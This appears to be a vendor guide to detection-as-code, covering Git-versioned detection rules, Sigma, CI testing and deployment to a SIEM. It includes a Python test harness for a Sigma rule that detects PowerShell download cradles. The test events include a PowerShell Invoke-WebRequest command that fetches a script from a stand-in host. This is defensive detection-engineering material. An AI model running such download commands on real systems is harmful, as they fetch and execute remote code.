Detection-as-code applies software-engineering discipline to security detections: instead of clicking rules together in a console, you write them as files, version them in Git, review them in pull requests, test them in CI/CD, and deploy them programmatically. The result is detections that are higher quality, auditable, and safe to change. This guide explains what detection-as-code is and how to adopt it.
What is detection-as-code?
Detection-as-code (DaC) treats detection rules as software artifacts. Rules live as text files in a version-controlled repository, changes go through peer-reviewed pull requests, automated tests verify they fire correctly, and deployment happens through a pipeline rather than by hand in a UI. It is the same workflow modern teams already use for application code, applied to the SIEM's detection content.
Why teams move to detection-as-code
- Rule quality — peer review catches mistakes before a noisy or broken rule reaches production.
- Change tracking — Git history shows who changed which detection, when, and why.
- Fast rollback — a problematic detection can be reverted like any code change.
- Replication — the same vetted detection set can be deployed across environments consistently.
- Collaboration — detection engineering becomes a team practice with a clear review trail.
How it works
- Repository — store detection rules as files in Git (GitHub, GitLab).
- Rule format — author in a format that supports automation: Sigma (vendor-neutral) or a native query language such as LPQL, SPL or KQL.
- CI/CD testing — on every change, a pipeline validates syntax and runs tests, often generating test events (e.g. with Atomic Red Team) to confirm the rule actually fires.
- Review & merge — changes are peer-reviewed in a pull request before they land.
- Deploy — merged rules are pushed to the SIEM programmatically.
Sigma: the portable detection format
Sigma is an open-source, vendor-agnostic signature format for SIEM detections. You write the detection logic once and convert it to the native query language of your platform (SPL, KQL, Elastic DSL, and others) with the Sigma toolchain. Because it is text-based and portable, Sigma is a natural fit for a version-controlled, detection-as-code workflow.
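As an added example (not code from LogPulse or the Sigma project), here is the CI test step from the workflow above applied to a Sigma rule: a constructed Sigma-style rule, shown already parsed into a dict as a YAML loader would return it, is evaluated against constructed test events to confirm it fires on the case it was written for and stays silent on a benign event and on a filtered one. The rule, field names and events are assumptions for illustration; a real pipeline would convert the rule with the Sigma toolchain and run it in the SIEM's own query engine rather than this small evaluator.

```python
# Added example, not LogPulse or Sigma project code: a minimal CI check that a
# Sigma-style rule fires on a constructed suspicious event and stays silent on
# a benign one and on a filtered one. Supports a subset of Sigma: the |contains
# and |endswith modifiers, list values (OR), case-insensitive string matching,
# and the condition "selection and not filter".

# The Sigma YAML already parsed into a dict (the shape yaml.safe_load returns).
RULE = {
    "title": "PowerShell Download Cradle (constructed sample rule)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],
        },
        "filter": {"ParentImage|endswith": "\\ccmexec.exe"},  # known-good parent
        "condition": "selection and not filter",
    },
}

# Constructed test events standing in for the output an Atomic Red Team run
# would feed the rule in CI: one must fire, the other two must not.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
HIT = {"Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
       "CommandLine": "powershell -c invoke-webrequest http://example.invalid/u.ps1"}
BENIGN = {"Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
          "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"}
FILTERED = {"Image": PS, "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe",
            "CommandLine": "powershell -c Invoke-WebRequest http://example.invalid/a.ps1"}

def match_field(event, key, expected):
    """One Sigma field with optional modifier; Sigma string matching is case-insensitive."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    for value in (expected if isinstance(expected, list) else [expected]):
        value = str(value).lower()
        if ((modifier == "contains" and value in actual)
                or (modifier == "endswith" and actual.endswith(value))
                or (modifier == "" and actual == value)):
            return True
    return False

def match_block(event, block):
    """Every field in a selection block must match (Sigma's implicit AND)."""
    return all(match_field(event, k, v) for k, v in block.items())

def rule_fires(rule, event):
    """Evaluate the rule condition; only 'selection and not filter' is supported here."""
    det = rule["detection"]
    if det["condition"].split() != ["selection", "and", "not", "filter"]:
        raise ValueError(f"unsupported condition: {det['condition']}")
    return match_block(event, det["selection"]) and not match_block(event, det["filter"])

def ci_check(rule=RULE):
    """The pipeline gate: returns each test event's verdict for the CI job to assert on."""
    return {name: rule_fires(rule, ev)
            for name, ev in (("hit", HIT), ("benign", BENIGN), ("filtered", FILTERED))}
```

A CI job would fail the pull request unless `ci_check()` reports `hit` as True and the other two as False, which is the "confirm the rule actually fires" step before the rule is merged and deployed.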
Detection engineering is a lifecycle
Detection-as-code is the delivery mechanism for detection engineering — the broader practice of researching threats, writing detections, testing them against real attack techniques, tuning out false positives, and retiring stale rules.
How LogPulse supports detection-as-code
In LogPulse, detections are LPQL queries: any saved LPQL search can become a custom, MITRE-tagged detection, and Sigma rules can be imported and transpiled to LPQL, so existing detection content carries over. AI agents can propose new detections over the MCP server; these are created in a disabled state until a human approves them, a review gate that mirrors the pull-request model. See What is SIEM for where detections sit in the platform, and Security Monitoring (SIEM) for the full detection capability.